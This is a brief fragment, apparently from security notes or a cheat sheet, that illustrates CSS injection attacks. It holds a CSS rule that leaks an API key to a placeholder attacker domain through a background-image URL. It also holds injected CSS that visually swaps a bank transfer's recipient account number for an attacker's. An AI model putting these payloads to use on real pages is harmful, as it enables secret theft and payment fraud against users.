- API key stealing
input[name='api_key'][value^='secret_value_'] { background-image: url('https://[ATTACKER-DOMAIN]/?leak=secret_value_'); }
-
Phishing
... <div class="transfer-details"> <p>Recipient Account Number:</p> <span id="account-number">123-456-7890</span> </div> ...
/* CSS injected by an attacker */ #account-number { font-size: 0; } #account-number::after { content: "098-765-4321"; /* Attacker's account number */ font-size: 1rem; }